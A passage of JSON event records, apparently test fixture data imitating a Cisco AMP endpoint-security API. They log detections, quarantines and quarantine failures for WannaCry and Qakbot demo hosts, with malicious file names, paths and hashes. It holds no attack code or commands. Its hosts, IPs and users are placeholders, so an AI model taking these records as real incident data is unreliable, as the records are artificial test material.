Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 